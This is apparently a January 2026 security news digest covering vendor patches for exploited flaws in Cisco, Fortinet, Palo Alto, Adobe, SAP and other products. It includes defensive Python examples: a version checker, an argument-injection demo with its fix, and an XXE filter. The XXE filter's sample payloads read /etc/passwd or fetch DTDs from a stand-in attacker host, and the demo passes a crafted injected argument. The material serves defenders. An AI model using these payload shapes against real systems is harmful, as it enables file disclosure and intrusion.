Beyond Information Security

Cisco Fixes Actively Exploited Zero-Day CVE-2026-20045 in Unified CM and Webex

Cisco has released patches for what it describes as a “critical” security vulnerability affecting multiple Unified Communications Manager (Unified CM) products and Webex Calling Dedicated Instance, which has been actively exploited as a zero-day in the wild.

The vulnerability, CVE-2026-20045 (CVSS score: 8.2), could permit an unauthenticated remote attacker to execute arbitrary commands on the underlying operating system of a susceptible device.

“This vulnerability is due to improper validation of user-supplied input in HTTP requests,” Cisco said in an advisory. “An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root.”

Cisco added that it rated the flaw critical, although a CVSS score of 8.2 falls in the High band, because exploitation can end in privilege escalation to root.

Source: The Hacker News / BleepingComputer / Help Net Security / Cisco security advisory

Link: https://thehackernews.com/2026/01/cisco-fixes-actively-exploited-zero-day.html

Link: https://www.bleepingcomputer.com/news/security/cisco-fixes-unified-communications-rce-zero-day-exploited-in-attacks/

Link: https://www.helpnetsecurity.com/2026/01/21/cisco-enterprise-communications-cve-2026-20045/

Link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b


Cisco Patches Zero-Day RCE Exploited by China-Linked APT in Secure Email Gateways

Cisco on Thursday released security updates for a maximum-severity flaw impacting Cisco AsyncOS Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager, nearly a month after the company disclosed that it had been exploited as a zero-day by a China-nexus advanced persistent threat (APT) actor codenamed UAT-9686.

The vulnerability, tracked as CVE-2025-20393 (CVSS score: 10.0), is a remote command execution flaw arising as a result of insufficient validation of HTTP requests by the Spam Quarantine feature. Successful exploitation of the defect could permit an attacker to execute arbitrary commands with root privileges on the underlying operating system of an affected appliance.

However, for the attack to work, three conditions must be met –

  • The appliance is running a vulnerable release of Cisco AsyncOS Software
  • The appliance is configured with the Spam Quarantine feature
  • The Spam Quarantine feature is exposed to and reachable from the internet

Last month, the networking equipment major revealed that it found evidence of UAT-9686 exploiting the vulnerability as early as late November 2025 to drop tunneling tools like ReverseSSH (aka AquaTunnel) and Chisel, and a log cleaning utility called AquaPurge. The attacks are also characterized by the deployment of a lightweight Python backdoor dubbed AquaShell that’s capable of receiving encoded commands and executing them.

Source: The Hacker News / BleepingComputer / SecurityWeek

Link: https://thehackernews.com/2026/01/cisco-patches-zero-day-rce-exploited-by.html

Link: https://www.bleepingcomputer.com/news/security/cisco-finally-fixes-asyncos-zero-day-exploited-since-november/

Link: https://www.securityweek.com/cisco-patches-vulnerability-exploited-by-chinese-hackers/


Palo Alto Fixes GlobalProtect DoS Flaw That Can Crash Firewalls Without Login

Palo Alto Networks has released security updates for a high-severity security flaw impacting GlobalProtect Gateway and Portal, for which it said there exists a proof-of-concept (PoC) exploit.

The vulnerability, tracked as CVE-2026-0227 (CVSS score: 7.7), has been described as a denial-of-service (DoS) condition in the GlobalProtect component of PAN-OS software, arising as a result of an improper check for exceptional conditions (CWE-754).

“A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial-of-service (DoS) to the firewall,” the company said in an advisory released Wednesday. “Repeated attempts to trigger this issue result in the firewall entering into maintenance mode.”

The issue, discovered and reported by an unnamed external researcher, affects the following versions –

  • PAN-OS 12.1 < 12.1.3-h3, < 12.1.4
  • PAN-OS 11.2 < 11.2.4-h15, < 11.2.7-h8, < 11.2.10-h2
  • PAN-OS 11.1 < 11.1.4-h27, < 11.1.6-h23, < 11.1.10-h9, < 11.1.13
  • PAN-OS 10.2 < 10.2.7-h32, < 10.2.10-h30, < 10.2.13-h18, < 10.2.16-h6, < 10.2.18-h1
  • PAN-OS 10.1 < 10.1.14-h20
  • Prisma Access 11.2 < 11.2.7-h8
  • Prisma Access 10.2 < 10.2.10-h29

Palo Alto Networks also clarified that the vulnerability is applicable only to PAN-OS NGFW or Prisma Access configurations with an enabled GlobalProtect gateway or portal. The company’s Cloud Next-Generation Firewall (NGFW) is not impacted. There are no workarounds to mitigate the flaw.
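Advisories in the form above ("PAN-OS 11.1 < 11.1.4-h27, < 11.1.6-h23, ...") are tedious to check by hand across a fleet, because hotfix builds sit between maintenance releases. The following is an added example, not Palo Alto Networks code: it transcribes the fixed builds listed above and decides whether an installed build is affected. The reading of the notation is this example's own assumption: each listed build is the first fixed build of its maintenance branch, so an installed build is affected when it is older than the fixed build of the closest branch at or above it, and trains that the list does not mention are treated as not affected. Re-check that reading against the vendor's current advisory before relying on it.

```python
"""Check a PAN-OS / Prisma Access version against the fixed builds for
CVE-2026-0227.  Added example, not vendor code; see the lead-in for the
assumptions behind the interpretation of the advisory notation."""

import re

# Fixed builds per release train, transcribed from the advisory excerpt.
FIXED_BUILDS = {
    "PAN-OS": {
        "12.1": ["12.1.3-h3", "12.1.4"],
        "11.2": ["11.2.4-h15", "11.2.7-h8", "11.2.10-h2"],
        "11.1": ["11.1.4-h27", "11.1.6-h23", "11.1.10-h9", "11.1.13"],
        "10.2": ["10.2.7-h32", "10.2.10-h30", "10.2.13-h18", "10.2.16-h6", "10.2.18-h1"],
        "10.1": ["10.1.14-h20"],
    },
    "Prisma Access": {
        "11.2": ["11.2.7-h8"],
        "10.2": ["10.2.10-h29"],
    },
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(text):
    """'11.1.4-h27' -> (11, 1, 4, 27).  A build without a hotfix suffix gets
    hotfix 0, so 11.1.4 sorts before 11.1.4-h1."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch, hotfix = m.groups()
    return (int(major), int(minor), int(patch), int(hotfix or 0))


def is_affected(product, installed):
    """True if the installed build is older than the fix for its branch.

    Assumption (see lead-in): the fix that applies is the first listed build
    whose base version (major.minor.patch) is at or above the installed base.
    An installed base newer than every listed fix, or a train that is not
    listed at all, is reported as not affected."""
    ver = parse_version(installed)
    train = f"{ver[0]}.{ver[1]}"
    fixed = FIXED_BUILDS.get(product, {}).get(train)
    if not fixed:
        return False
    for fixed_text in sorted(fixed, key=parse_version):
        fixed_ver = parse_version(fixed_text)
        if ver[:3] <= fixed_ver[:3]:
            return ver < fixed_ver
    return False


if __name__ == "__main__":
    # Constructed sample inventory, e.g. as pulled from Panorama or
    # 'show system info' on each firewall.
    inventory = [
        ("PAN-OS", "11.1.4-h20"),          # below 11.1.4-h27: affected
        ("PAN-OS", "11.1.4-h27"),          # fixed
        ("PAN-OS", "11.1.5"),              # its fix is 11.1.6-h23: affected
        ("PAN-OS", "11.1.13"),             # fixed
        ("PAN-OS", "10.1.14-h19"),         # affected
        ("Prisma Access", "10.2.10-h29"),  # fixed
    ]
    for product, version in inventory:
        state = "AFFECTED" if is_affected(product, version) else "fixed/not affected"
        print(f"{product:14} {version:14} {state}")
```

Because the advisory lists no workaround and a GlobalProtect portal or gateway is by design reachable from the internet, the useful output of a check like this is the list of builds that must move to a fixed hotfix now rather than at the next maintenance window.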

Source: The Hacker News / BleepingComputer

Link: https://thehackernews.com/2026/01/palo-alto-fixes-globalprotect-dos-flaw.html

Link: https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-dos-bug-letting-hackers-disable-firewalls/


Exploit code public for critical FortiSIEM command injection flaw

Technical details and a public exploit have been published for a critical vulnerability affecting Fortinet’s Security Information and Event Management (SIEM) solution that could be leveraged by a remote, unauthenticated attacker to execute commands or code.

The vulnerability is tracked as CVE-2025-64155 and chains two issues: an arbitrary file write with admin permissions, followed by privilege escalation to root.

Researchers at penetration testing company Horizon3.ai reported the security issue in mid-August 2025, but it was only fixed on January 13, 2026.

Fortinet describes the CVE-2025-64155 vulnerability as “an improper neutralization of special elements used in an OS command vulnerability in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests.”

Horizon3.ai has published a detailed write-up explaining that the root cause of the issue is the exposure of dozens of command handlers on the phMonitor service, which can be invoked remotely without authentication.

Source: BleepingComputer / SecurityWeek

Link: https://www.bleepingcomputer.com/news/security/exploit-code-public-for-critical-fortisiem-command-injection-flaw/

Link: https://www.bleepingcomputer.com/news/security/hackers-now-exploiting-critical-fortinet-fortisiem-vulnerability-in-attacks/

Link: https://www.securityweek.com/fortinet-patches-critical-vulnerabilities-in-fortifone-fortisiem/


Fortinet Fixes Critical FortiSIEM Flaw Allowing Unauthenticated Remote Code Execution

Fortinet has released updates to fix a critical security flaw impacting FortiSIEM that could allow an unauthenticated attacker to achieve code execution on susceptible instances.

The OS command injection vulnerability, tracked as CVE-2025-64155, is rated 9.4 out of 10.0 on the CVSS scoring system.

“An improper neutralization of special elements used in an OS command (‘OS command injection’) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests,” the company said in a Tuesday bulletin.

Fortinet said the vulnerability affects only Supervisor (Super) and Worker nodes. The affected versions and the corresponding fixes are as follows –

  • FortiSIEM 6.7.0 through 6.7.10 (Migrate to a fixed release)
  • FortiSIEM 7.0.0 through 7.0.4 (Migrate to a fixed release)
  • FortiSIEM 7.1.0 through 7.1.8 (Upgrade to 7.1.9 or above)
  • FortiSIEM 7.2.0 through 7.2.6 (Upgrade to 7.2.7 or above)
  • FortiSIEM 7.3.0 through 7.3.4 (Upgrade to 7.3.5 or above)
  • FortiSIEM 7.4.0 (Upgrade to 7.4.1 or above)
  • FortiSIEM 7.5 (Not affected)
  • FortiSIEM Cloud (Not affected)

Horizon3.ai security researcher Zach Hanley, who is credited with discovering and reporting the flaw on August 14, 2025, said it comprises two moving parts –

  • An unauthenticated argument injection vulnerability that leads to arbitrary file write, allowing for remote code execution as the admin user
  • A file overwrite privilege escalation vulnerability that leads to root access and complete compromise of the appliance

Specifically, the problem has to do with how FortiSIEM’s phMonitor service – a crucial backend process responsible for health monitoring, task distribution, and inter-node communication via TCP port 7900 – handles incoming requests related to logging security events to Elasticsearch.
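The first half of the chain, as described in this item and the one above it, is an argument injection: request data ends up in a command line, and a value that starts with a dash is interpreted as an option, which here let the requester choose a file to write. The following is an added example of that bug class beside its fix. It is not FortiSIEM code and does not reproduce the real phMonitor request; the "event-logger" helper, its --output option and the message field are hypothetical stand-ins for a service that builds an argument vector from request data.

```python
"""Argument injection that becomes an arbitrary file write, beside the fix.

Added example for the bug class described in the FortiSIEM items above.
Not FortiSIEM code; the helper and its options are hypothetical."""

import argparse
import os
import tempfile


def logger_tool(argv):
    """Hypothetical helper the service invokes with a built argument vector.
    Appends the message to whatever file --output names and returns the
    parsed arguments so callers can see what the tool did."""
    parser = argparse.ArgumentParser(prog="event-logger", exit_on_error=False)
    parser.add_argument("--output", default=None, help="log file to append to")
    parser.add_argument("message", nargs="?", default="")
    args = parser.parse_args(argv)
    if args.output:
        with open(args.output, "a", encoding="utf-8") as fh:
            fh.write(args.message + "\n")
    return vars(args)


def log_event_vulnerable(untrusted_message):
    """Request data is placed directly into argv.  A value that starts with
    '-' is parsed as an option, so the requester picks the output path."""
    return logger_tool([untrusted_message])


def log_event_hardened(untrusted_message):
    """Two independent fixes: reject option-like values, and pass '--' so
    the tool treats everything after it as positional data."""
    if untrusted_message.startswith("-"):
        raise ValueError("refusing option-like value in message field")
    return logger_tool(["--", untrusted_message])


def demo():
    """Run both callers on a crafted message inside a scratch directory.
    Returns (vulnerable caller created the attacker-chosen file,
             hardened caller rejected the value)."""
    with tempfile.TemporaryDirectory() as scratch:
        target = os.path.join(scratch, "attacker-chosen.txt")
        crafted = f"--output={target}"   # constructed attacker-controlled input
        log_event_vulnerable(crafted)
        vulnerable_wrote = os.path.exists(target)
        try:
            log_event_hardened(crafted)
            hardened_rejected = False
        except ValueError:
            hardened_rejected = True
        return vulnerable_wrote, hardened_rejected


if __name__ == "__main__":
    wrote, rejected = demo()
    print(f"vulnerable caller wrote the attacker-chosen file: {wrote}")
    print(f"hardened caller rejected the crafted value: {rejected}")
```

The "--" separator is honoured by getopt- and argparse-style parsers but not by every tool, so the value check is the fix to rely on; better still is to not build a command line from request data at all and call the underlying function directly. The second half of the real chain, a file overwrite that escalates from the admin user to root, is what makes an unprivileged write into a full compromise, which is why file writes by a service account deserve the same scrutiny as command execution.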

Source: The Hacker News / Dark Reading

Link: https://thehackernews.com/2026/01/fortinet-fixes-critical-fortisiem-flaw.html

Link: https://www.darkreading.com/vulnerabilities-threats/fortinet-critical-fortisiem-flaw-exploited


Microsoft Fixes 114 Windows Flaws in January 2026 Patch, One Actively Exploited

Microsoft on Tuesday rolled out its first security update for 2026, addressing 114 security flaws, including one vulnerability that it said has been actively exploited in the wild.

Of the 114 flaws, eight are rated Critical, and 106 are rated Important in severity. As many as 58 vulnerabilities have been classified as privilege escalation, followed by 22 information disclosure, 21 remote code execution, and five spoofing flaws. According to data collected by Fortra, the update marks the third-largest January Patch Tuesday after January 2025 and January 2022.

These patches are in addition to two security flaws that Microsoft has addressed in its Edge browser since the release of the December 2025 Patch Tuesday update, including a spoofing flaw in its Android app (CVE-2025-65046, CVSS score: 3.1) and a case of insufficient policy enforcement in Chromium’s WebView tag (CVE-2026-0628, CVSS score: 8.8).

The vulnerability that has come under in-the-wild exploitation is CVE-2026-20805 (CVSS score: 5.5), an information disclosure flaw impacting Desktop Window Manager. The Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) have been credited with identifying and reporting the flaw.

“Exposure of sensitive information to an unauthorized actor in Desktop Windows Manager (DWM) allows an authorized attacker to disclose information locally,” Microsoft said in an advisory. “The type of information that could be disclosed if an attacker successfully exploited this vulnerability is a section address from a remote ALPC port, which is user-mode memory.”

There are currently no details on how the vulnerability is being exploited, the scale of such efforts, and who may be behind the activity.

Source: The Hacker News / BleepingComputer / Krebs on Security / Dark Reading / SecurityWeek / Cisco Talos Intelligence Group / SANS Internet Storm Center

Link: https://thehackernews.com/2026/01/microsoft-fixes-114-windows-flaws-in.html

Link: https://www.bleepingcomputer.com/news/microsoft/microsoft-january-2026-patch-tuesday-fixes-3-zero-days-114-flaws/

Link: https://krebsonsecurity.com/2026/01/patch-tuesday-january-2026-edition/

Link: https://www.darkreading.com/application-security/microsofts-starts-2026-bang-zero-day

Link: https://www.securityweek.com/microsoft-patches-exploited-windows-zero-day-111-other-vulnerabilities/

Link: https://blog.talosintelligence.com/microsoft-patch-tuesday-january-2026/

Link: https://isc.sans.edu/diary/January%202026%20Microsoft%20Patch%20Tuesday%20Summary/32624


ServiceNow Patches Critical AI Platform Flaw Allowing Unauthenticated User Impersonation

ServiceNow has disclosed details of a now-patched critical security flaw impacting its ServiceNow artificial intelligence (AI) Platform that could enable an unauthenticated user to impersonate another user and perform arbitrary actions as that user.

The vulnerability, tracked as CVE-2025-12420, carries a CVSS score of 9.3 out of 10.0. It has been codenamed BodySnatcher by AppOmni.

“This issue […] could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform,” the company said in an advisory released Monday.

The shortcoming was addressed by ServiceNow on October 30, 2025, by deploying a security update to the majority of hosted instances, with the company also sharing the patches with ServiceNow partners and self-hosted customers.

The following versions include a fix for CVE-2025-12420 –

  • Now Assist AI Agents (sn_aia) – 5.1.18 or later and 5.2.19 or later
  • Virtual Agent API (sn_va_as_service) – 3.15.2 or later and 4.0.4 or later

ServiceNow credited Aaron Costello, chief of SaaS Security Research at AppOmni, with discovering and reporting the flaw in October 2025. While there is no evidence that the vulnerability has been exploited in the wild, users are advised to apply an appropriate security update as soon as possible to mitigate potential threats.

Source: The Hacker News / Dark Reading

Link: https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.html

Link: https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow


MITRE Launches New Security Framework for Embedded Systems

MITRE on Tuesday announced the launch of Embedded Systems Threat Matrix (ESTM), a cybersecurity framework designed to help organizations protect critical embedded systems.

Inspired by the popular ATT&CK framework and derived from MITRE’s theoretical research and proof-of-concept models, the ESTM categorizes specific attack tactics and techniques tailored to hardware and firmware environments.

The model maps both established and emerging attack vectors to assist organizations in identifying vulnerabilities within embedded architectures.

MITRE says the framework can be used in industries such as energy, robotics, industrial controls, transportation, and healthcare.

“The ESTM has proven valuable in various applications, including cyber threat modeling and attack path analysis, and its alignment with established cybersecurity frameworks ensures seamless integration with existing security practices,” MITRE says on its website.

The non-profit R&D organization also points out that ESTM works with the EMB3D Threat Model.

Source: SecurityWeek

Link: https://www.securityweek.com/mitre-launches-new-security-framework-for-embedded-systems/


Oracle’s First 2026 CPU Delivers 337 New Security Patches

Oracle has released 337 new security patches for over 30 products as part of its first Critical Patch Update (CPU) for 2026.

There appear to be roughly 230 unique CVEs in Oracle’s January 2026 CPU advisory.

More than two dozen of the fresh fixes resolve critical-severity vulnerabilities and over 235 patches address flaws that are remotely exploitable without authentication.

Roughly half a dozen patches address CVE-2025-66516 (CVSS score of 10/10), a critical defect in Apache Tika that could lead to XML External Entity (XXE) injection attacks.

Impacting three modules of Apache Tika, the vulnerability can be exploited by placing crafted XFA files inside PDF documents.

Oracle products that received patches for the issue include Commerce, Communications, Construction and Engineering, Fusion Middleware, and PeopleSoft.

Once again, Oracle Communications received the largest number of security fixes, at 56. Of these, 34 resolve bugs that can be exploited by remote, unauthenticated attackers.

Source: SecurityWeek / Oracle security advisory

Link: https://www.securityweek.com/oracles-first-2026-cpu-delivers-337-new-security-patches/

Link: https://www.oracle.com/security-alerts/cpujan2026.html#AppendixFMW


Adobe Patches Critical Apache Tika Bug in ColdFusion

Adobe has released security updates for 11 products on January 2026 Patch Tuesday, addressing a total of 25 vulnerabilities, including a critical code execution flaw.

The critical-severity issue, tracked as CVE-2025-66516 (CVSS score of 10/10), is an XML External Entity (XXE) injection bug in Apache Tika modules that could be exploited via XFA files placed inside PDF documents.

The security defect was patched in early December, when Apache warned that successful exploitation could lead to information leaks, SSRF attacks, denial-of-service (DoS), or remote code execution (RCE).
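The Tika bug, shared by the Oracle item above and this one, is a classic XXE shape: XML (here, an XFA form inside a PDF) that declares an external DTD or external entities, which a parser with entity resolution enabled will fetch. Patching is the fix; until every product that embeds Tika is updated, a pre-filter that refuses such documents before they reach the rich parser is a reasonable compensating control. The following is an added example, not Tika, Oracle or Adobe code. It uses the expat bindings in Python's standard library, which do not fetch anything external by default, to report the constructs an XXE payload depends on. Extracting the XFA stream from a PDF is out of scope; the function takes XML bytes directly, and the sample documents are constructed for the example.

```python
"""Pre-filter for XML that will be handed to a document parser such as Tika.

Added example for the Apache Tika XXE issue (CVE-2025-66516) in the Oracle
and Adobe items above.  Not vendor code; samples are constructed."""

import xml.parsers.expat as expat


def xxe_findings(xml_bytes):
    """Parse without resolving anything external and return a list of
    findings.  An empty list means the document is well-formed and declares
    no external DTD and no external entities."""
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            findings.append(f"DOCTYPE {name} loads external DTD {system_id or public_id}")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id or public_id:
            kind = "parameter entity" if is_param else "entity"
            findings.append(f"external {kind} {name} -> {system_id or public_id}")

    def on_external_ref(context, base, system_id, public_id):
        findings.append(f"reference to external entity {system_id or public_id}")
        return 0  # refuse to fetch it; expat aborts the parse

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as err:
        # Either our refusal above or genuinely malformed input; a document
        # that cannot be parsed cleanly is not forwarded either way.
        if not findings:
            findings.append(f"not well-formed: {err}")
    return findings


# Constructed samples: a benign XFA-style form, an internal-only entity,
# and three shapes of XXE payload.
BENIGN_XFA = (b'<?xml version="1.0"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">'
              b'<template><subform name="form1"/></template></xdp:xdp>')
INTERNAL_ONLY = b'<!DOCTYPE xdp [<!ENTITY greet "hello">]><xdp>&greet;</xdp>'
XXE_LOCAL_FILE = (b'<!DOCTYPE xdp [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                  b'<xdp>&xxe;</xdp>')
XXE_EXTERNAL_DTD = b'<!DOCTYPE xdp SYSTEM "http://attacker.invalid/evil.dtd"><xdp/>'
XXE_PARAMETER = (b'<!DOCTYPE xdp [<!ENTITY % sp SYSTEM "http://attacker.invalid/sp.dtd">'
                 b'%sp;]><xdp/>')


def triage(samples):
    """Map sample name -> (accept, findings) for a dict of XML documents."""
    result = {}
    for name, doc in samples.items():
        found = xxe_findings(doc)
        result[name] = (not found, found)
    return result


if __name__ == "__main__":
    verdicts = triage({
        "benign": BENIGN_XFA, "internal-only": INTERNAL_ONLY,
        "local-file": XXE_LOCAL_FILE, "external-dtd": XXE_EXTERNAL_DTD,
        "parameter": XXE_PARAMETER,
    })
    for name, (accept, found) in verdicts.items():
        print(f"{name:14} {'ACCEPT' if accept else 'REJECT'} {found}")
```

Two caveats for anyone deploying something like this. The filter only looks at external references; internal entities are passed through, so entity-expansion bombs need a separate limit on expansion count or size. And on the Java side, where Tika and ColdFusion live, the durable hardening is to configure every XML parser with DOCTYPE declarations disallowed (the Xerces feature `http://apache.org/xml/features/disallow-doctype-decl`) rather than to rely on a front-end filter alone.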

On Tuesday, Adobe released a ColdFusion security update to resolve CVE-2025-66516, noting that all ColdFusion 2025 Update 5 and earlier versions, and ColdFusion 2023 Update 17 and earlier versions are affected, on all platforms.

The vulnerability was addressed in ColdFusion 2025 Update 6 and ColdFusion 2023 Update 18. Adobe has assigned the security bulletin a priority rating of ‘1’, urging users to update as soon as possible.

Another Adobe product that received an update on January 2026 Patch Tuesday is Dreamweaver. The security refresh resolves five high-severity flaws, four leading to arbitrary code execution and one leading to arbitrary system file write.

Source: SecurityWeek

Link: https://www.securityweek.com/adobe-patches-critical-apache-tika-bug-in-coldfusion/


SAP’s January 2026 Security Updates Patch Critical Vulnerabilities

Enterprise software maker SAP on Tuesday announced the release of 17 new security notes as part of its January 2026 Security Patch Day. Four of the notes address critical-severity vulnerabilities.

The first note in SAP’s January 2026 advisory resolves CVE-2026-0501 (CVSS score of 9.9), a critical SQL injection bug in S/4HANA.

The issue impacts a Remote Function Call-enabled module relying on the ABAP Database Connectivity (ADBC) framework for the execution of a native SQL statement, explains Onapsis, which discovered and reported the bug.

“This SQL statement is provided through an input parameter and allows an attacker to execute arbitrary SQL commands. On successful exploitation, the system can be fully compromised,” the security firm notes.

The second critical bug that SAP addressed on Tuesday is CVE-2026-0500 (CVSS score of 9.6), a remote code execution (RCE) issue in Wily Introscope Enterprise Manager.

According to Onapsis, the application allows unauthenticated attackers to craft malicious JNLP (Java Network Launch Protocol) files that can be accessed via URLs.

Source: SecurityWeek

Link: https://www.securityweek.com/saps-january-2026-security-updates-patch-critical-vulnerabilities/


SCANT: A (kind-of-decent) Framework for Ethical Deepfake Creation & Distribution

Lots of damage has been done with AI, and to keep from deep-sixing the forward-leaning tone I want in this article, I’ll refrain from noting any details – the internet is available for you to search to your heart’s content. I want to start with that note because how we use AI is not just an option, like whether we want a cinnamon roll or a bagel at breakfast. AI use has meaning – whether it’s dark or not depends on each of us.

Source: Secjuice

Link: https://www.secjuice.com/scant-framework-for-ethical-deepfake-creation-distribution/